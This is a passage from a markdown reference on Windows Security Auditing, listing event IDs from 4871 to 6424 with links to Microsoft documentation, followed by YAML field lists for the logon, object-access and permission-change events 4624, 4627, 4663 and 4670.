(CRL).](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4871)\n- [4872: Certificate Services published the certificate revocation list (CRL).](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4872)\n- [4873: A certificate request extension changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4873)\n- [4874: One or more certificate request attributes changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4874)\n- [4875: Certificate Services received a request to shut down.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4875)\n- [4876: Certificate Services backup started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4876)\n- [4877: Certificate Services backup completed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4877)\n- [4878: Certificate Services restore started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4878)\n- [4879: Certificate Services restore completed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4879)\n- [4880: Certificate Services started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4880)\n- [4881: Certificate Services stopped.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4881)\n- [4882: The security permissions for Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4882)\n- [4883: Certificate Services retrieved an archived key.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4883)\n- [4884: Certificate Services imported a certificate into its database.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4884)\n- [4885: The audit filter for Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4885)\n- [4886: Certificate Services received a certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4886)\n- [4887: Certificate Services approved a certificate request and issued a certificate.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4887)\n- [4888: Certificate Services denied a certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4888)\n- [4889: Certificate Services set the status of a certificate request to pending.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4889)\n- [4890: The certificate manager settings for Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4890)\n- [4891: A configuration entry changed in Certificate Services.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4891)\n- [4892: A property of Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4892)\n- [4893: Certificate Services archived a key.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4893)\n- [4894: Certificate Services imported and archived a key.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4894)\n- [4895: Certificate Services published the CA certificate to Active Directory Domain Services.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4895)\n- [4896: One or more rows have been deleted from the certificate database.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4896)\n- [4897: Role separation enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4897)\n- [4898: Certificate Services loaded a template.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4898)\n- [4902: The Per-user audit policy table was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4902)\n- [4904: An attempt was made to register a security event source.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4904)\n- [4905: An attempt was made to unregister a security event source.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4905)\n- [4906: The CrashOnAuditFail value has changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4906)\n- [4907: Auditing settings on object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4907)\n- [4908: Special Groups Logon table modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4908)\n- [4909: The local policy settings for the TBS were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4909)\n- [4910: The group policy settings for the TBS were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4910)\n- [4911: Resource attributes of the object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4911)\n- [4912: Per User Audit Policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4912)\n- [4913: Central Access Policy on the object was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4913)\n- [4928: An Active Directory replica source naming context was established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4928)\n- [4929: An Active Directory replica source naming context was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4929)\n- [4930: An Active Directory replica source naming context was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4930)\n- [4931: An Active Directory replica destination naming context was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4931)\n- [4932: Synchronization of a replica of an Active Directory naming context has begun.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4932)\n- [4933: Synchronization of a replica of an Active Directory naming context has ended.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4933)\n- [4934: Attributes of an Active Directory object were replicated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4934)\n- [4935: Replication failure begins.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4935)\n- [4936: Replication failure ends.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4936)\n- [4937: A lingering object was removed from a replica.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4937)\n- [4944: The following policy was active when the Windows Firewall started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4944)\n- [4945: A rule was listed when the Windows Firewall started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4945)\n- [4946: A change has been made to Windows Firewall exception list. A rule was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4946)\n- [4947: A change has been made to Windows Firewall exception list. A rule was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4947)\n- [4948: A change has been made to Windows Firewall exception list. A rule was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4948)\n- [4949: Windows Firewall settings were restored to the default values.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4949)\n- [4950: A Windows Firewall setting has changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4950)\n- [4951: A rule has been ignored because its major version number was not recognized by Windows Firewall.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4951)\n- [4952: Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4952)\n- [4953: A rule has been ignored by Windows Firewall because it could not parse the rule.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4953)\n- [4954: Windows Firewall Group Policy settings have changed. The new settings have been applied.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4954)\n- [4956: Windows Firewall has changed the active profile.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4956)\n- [4957: Windows Firewall did not apply the following rule:](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4957)\n- [4958: Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer:](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4958)\n- [4960: IPsec dropped an inbound packet that failed an integrity check.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4960)\n- 4961: IPsec dropped an inbound packet that failed a replay check.\n- 4962: IPsec dropped an inbound packet that failed a replay check.\n- [4963: IPsec dropped an inbound clear text packet that should have been secured.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4963)\n- [4964: Special groups have been assigned to a new logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964)\n- [4965: IPsec received a packet from a remote computer with an incorrect Security Parameter Index (SPI).](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4965)\n- [4976: During Main Mode negotiation, IPsec received an invalid negotiation packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4976)\n- [4977: During Quick Mode negotiation, IPsec received an invalid negotiation packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4977)\n- [4978: During Extended Mode negotiation, IPsec received an invalid negotiation packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4978)\n- [4979: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4979)\n- [4980: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4980)\n- [4981: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4981)\n- [4982: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4982)\n- [4983: An IPsec Extended Mode negotiation failed. The corresponding Main Mode security association has been deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4983)\n- [4984: An IPsec Extended Mode negotiation failed. The corresponding Main Mode security association has been deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4984)\n- [4985: The state of a transaction has changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4985)\n- [5024: The Windows Firewall Service has started successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5024)\n- [5025: The Windows Firewall Service has been stopped.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5025)\n- [5027: The Windows Firewall Service was unable to retrieve the security policy from the local storage. The service will continue enforcing the current policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5027)\n- [5028: The Windows Firewall Service was unable to parse the new security policy. The service will continue with currently enforced policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5028)\n- [5029: The Windows Firewall Service failed to initialize the driver. The service will continue to enforce the current policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5029)\n- [5030: The Windows Firewall Service failed to start.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5030)\n- [5031: The Windows Firewall Service blocked an application from accepting incoming connections on the network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5031)\n- [5032: Windows Firewall was unable to notify the user that it blocked an application from accepting incoming connections on the network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5032)\n- [5033: The Windows Firewall Driver has started successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5033)\n- [5034: The Windows Firewall Driver was stopped.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5034)\n- [5035: The Windows Firewall Driver failed to start.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5035)\n- [5037: The Windows Firewall Driver detected critical runtime error. Terminating.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5037)\n- [5038: Code integrity determined that the image hash of a file is not valid. The file could be corrupt due to unauthorized modification or the invalid hash could indicate a potential disk device error.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5038)\n- [5039: A registry key was virtualized.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5039)\n- [5040: A change has been made to IPsec settings. An Authentication Set was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5040)\n- [5041: A change has been made to IPsec settings. An Authentication Set was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5041)\n- [5042: A change has been made to IPsec settings. An Authentication Set was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5042)\n- [5043: A change has been made to IPsec settings. A Connection Security Rule was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5043)\n- [5044: A change has been made to IPsec settings. A Connection Security Rule was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5044)\n- [5045: A change has been made to IPsec settings. A Connection Security Rule was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5045)\n- [5046: A change has been made to IPsec settings. A Crypto Set was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5046)\n- [5047: A change has been made to IPsec settings. A Crypto Set was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5047)\n- [5048: A change has been made to IPsec settings. A Crypto Set was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5048)\n- [5049: An IPsec Security Association was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5049)\n- [5051: A file was virtualized.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5051)\n- [5056: A cryptographic self-test was performed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5056)\n- [5057: A cryptographic primitive operation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5057)\n- [5058: Key file operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5058)\n- [5059: Key migration operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5059)\n- [5060: Verification operation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5060)\n- [5061: Cryptographic operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5061)\n- [5062: A kernel-mode cryptographic self-test was performed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5062)\n- [5063: A cryptographic provider operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5063)\n- [5064: A cryptographic context operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5064)\n- [5065: A cryptographic context modification was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5065)\n- [5066: A cryptographic function operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5066)\n- [5067: A cryptographic function modification was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5067)\n- [5068: A cryptographic function provider operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5068)\n- [5069: A cryptographic function property operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5069)\n- [5070: A cryptographic function property modification was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5070)\n- [5136: A directory service object was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136)\n- [5137: A directory service object was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5137)\n- [5138: A directory service object was undeleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5138)\n- [5139: A directory service object was moved.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5139)\n- [5140: A network share object was accessed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5140)\n- [5141: A directory service object was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5141)\n- [5142: A network share object was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5142)\n- [5143: A network share object was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5143)\n- [5144: A network share object was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5144)\n- [5145: A network share object was checked to see whether client can be granted desired access.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5145)\n- [5148: The Windows Filtering Platform has detected a DoS attack and entered a defensive mode; packets associated with this attack will be discarded.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5148)\n- [5149: The DoS attack has subsided and normal processing is being resumed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5149)\n- [5150: The Windows Filtering Platform blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5150)\n- [5151: A more restrictive Windows Filtering Platform filter has blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5151)\n- [5152: The Windows Filtering Platform blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5152)\n- [5153: A more restrictive Windows Filtering Platform filter has blocked a packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5153)\n- [5154: The Windows Filtering Platform has permitted an application or service to listen on a port for incoming connections.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5154)\n- [5155: The Windows Filtering Platform has blocked an application or service from listening on a port for incoming connections.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5155)\n- [5156: The Windows Filtering Platform has permitted a connection.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156)\n- [5157: The Windows Filtering Platform has blocked a connection.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5157)\n- [5158: The Windows Filtering Platform has permitted a bind to a local port.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5158)\n- [5159: The Windows Filtering Platform has blocked a bind to a local port.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5159)\n- [5168: SPN check for SMB/SMB2 failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5168)\n- [5376: Credential Manager credentials were backed up.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5376)\n- [5377: Credential Manager credentials were restored from a backup.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5377)\n- [5378: The requested credentials delegation was disallowed by policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5378)\n- [5440: The following callout was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5440)\n- [5441: The following filter was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5441)\n- [5442: The following provider was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5442)\n- [5443: The following provider context was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5443)\n- [5444: The following sub-layer was present when the Windows Filtering Platform Base Filtering Engine started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5444)\n- [5446: A Windows Filtering Platform callout has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5446)\n- [5447: A Windows Filtering Platform filter has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5447)\n- [5448: A Windows Filtering Platform provider has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5448)\n- [5449: A Windows Filtering Platform provider context has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5449)\n- [5450: A Windows Filtering Platform sub-layer has been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5450)\n- [5451: An IPsec Quick Mode security association was established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5451)\n- [5452: An IPsec Quick Mode security association ended.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5452)\n- [5453: An IPsec negotiation with a remote computer failed because the IKE and AuthIP IPsec Keying Modules (IKEEXT) service is not started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5453)\n- [5456: PAStore Engine applied Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5456)\n- [5457: PAStore Engine failed to apply Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5457)\n- [5458: PAStore Engine applied locally cached copy of Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5458)\n- [5459: PAStore Engine failed to apply locally cached copy of Active Directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5459)\n- [5460: PAStore Engine applied local registry storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5460)\n- [5461: PAStore Engine failed to apply local registry storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5461)\n- [5462: PAStore Engine failed to apply some rules of the active IPsec policy on the computer. Use the IP Security Monitor snap-in to diagnose the problem.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5462)\n- [5463: PAStore Engine polled for changes to the active IPsec policy and detected no changes.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5463)\n- [5464: PAStore Engine polled for changes to the active IPsec policy, detected changes, and applied them to IPsec Services.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5464)\n- [5465: PAStore Engine received a control for forced reloading of IPsec policy and processed the control successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5465)\n- [5466: PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory cannot be reached, and will use the cached copy of the Active Directory IPsec policy instead. Any changes made to the Active Directory IPsec policy since the last poll could not be applied.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5466)\n- [5467: PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, and found no changes to the policy. The cached copy of the Active Directory IPsec policy is no longer being used.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5467)\n- [5468: PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, found changes to the policy, and applied those changes. The cached copy of the Active Directory IPsec policy is no longer being used.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5468)\n- [5471: PAStore Engine loaded local storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5471)\n- [5472: PAStore Engine failed to load local storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5472)\n- [5473: PAStore Engine loaded directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5473)\n- [5474: PAStore Engine failed to load directory storage IPsec policy on the computer.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5474)\n- [5477: PAStore Engine failed to add quick mode filter.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5477)\n- [5478: IPsec Services has started successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5478)\n- 5479: IPsec Services has been shut down successfully. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks.\n- 5480: IPsec Services failed to get the complete list of network interfaces on the computer. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem.\n- 5483: IPsec Services failed to initialize RPC server. IPsec Services could not be started.\n- 5484: IPsec Services has experienced a critical failure and has been shut down. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks.\n- 5485: IPsec Services failed to process some IPsec filters on a plug-and-play event for network interfaces. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem.\n- [5632: A request was made to authenticate to a wireless network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5632)\n- [5633: A request was made to authenticate to a wired network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5633)\n- [5712: A Remote Procedure Call (RPC) was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5712)\n- [5888: An object in the COM+ Catalog was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5888)\n- [5889: An object was deleted from the COM+ Catalog.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5889)\n- [5890: An object was added to the COM+ Catalog.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5890)\n- [6144: Security policy in the group policy objects has been applied successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6144)\n- [6145: One or more errors occurred while processing security policy in the group policy objects.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6145)\n- [6272: Network Policy Server granted access to a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6272)\n- [6273: Network Policy Server denied access to a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6273)\n- [6274: Network Policy Server discarded the request for a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6274)\n- [6275: Network Policy Server discarded the accounting request for a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6275)\n- [6276: Network Policy Server quarantined a user.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6276)\n- [6277: Network Policy Server granted access to a user but put it on probation because the host did not meet the defined health policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6277)\n- [6278: Network Policy Server granted full access to a user because the host met the defined health policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6278)\n- [6279: Network Policy Server locked the user account due to repeated failed authentication attempts.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6279)\n- [6280: Network Policy Server unlocked the user account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6280)\n- [6281: Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6281)\n- [6400: BranchCache: Received an incorrectly formatted response while discovering availability of content.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6400)\n- [6401: BranchCache: Received invalid data from a peer. Data discarded.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6401)\n- [6402: BranchCache: The message to the hosted cache offering it data is incorrectly formatted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6402)\n- [6403: BranchCache: The hosted cache sent an incorrectly formatted response to the client.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6403)\n- [6404: BranchCache: Hosted cache could not be authenticated using the provisioned SSL certificate.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6404)\n- [6405: BranchCache: %2 instance(s) of event id %1 occurred.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6405)\n- [6406: %1 registered to Windows Firewall to control filtering for the following: %2](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6406)\n- 6407: N/A\n- [6408: Registered product %1 failed and Windows Firewall is now controlling the filtering for %2](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6408)\n- [6409: BranchCache: A service connection point object could not be parsed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6409)\n- [6410: Code integrity determined that a file does not meet the security requirements to load into a process.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6410)\n- [6416: A new external device was recognized by the System](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6416)\n- [6419: A request was made to disable a device](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6419)\n- [6420: A device was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6420)\n- [6421: A request was made to enable a device.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6421)\n- [6422: A device was enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6422)\n- [6423: The installation of this device is forbidden by system policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423)\n- [6424: The installation of this device was allowed, after having previously been forbidden by policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6424)\n\n</details>\n\n## Event Fields\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4624\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- TargetUserSid\n- TargetUserName\n- TargetDomainName\n- TargetLogonId\n- LogonType\n- LogonProcessName\n- AuthenticationPackageName\n- WorkstationName\n- LogonGuid\n- TransmittedServices\n- LmPackageName\n- KeyLength\n- ProcessId\n- ProcessName\n- IpAddress\n- IpPort\n- ImpersonationLevel\n- RestrictedAdminMode\n- RemoteCredentialGuard\n- TargetOutboundUserName\n- TargetOutboundDomainName\n- VirtualAccount\n- TargetLinkedLogonId\n- ElevatedToken\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4627\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- TargetUserSid\n- TargetUserName\n- TargetDomainName\n- TargetLogonId\n- LogonType\n- EventIdx\n- EventCountTotal\n- GroupMembership\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4663\n\n<details>\n    <summary>Expand Details</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- ObjectServer\n- ObjectType\n- ObjectName\n- HandleId\n- AccessList\n- AccessMask\n- ProcessId\n- ProcessName\n- ResourceAttributes\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4670\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- ObjectServer\n- ObjectType\n- ObjectName\n- HandleId\n- OldSd\n- NewSd\n- ProcessId\n- ProcessName\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / 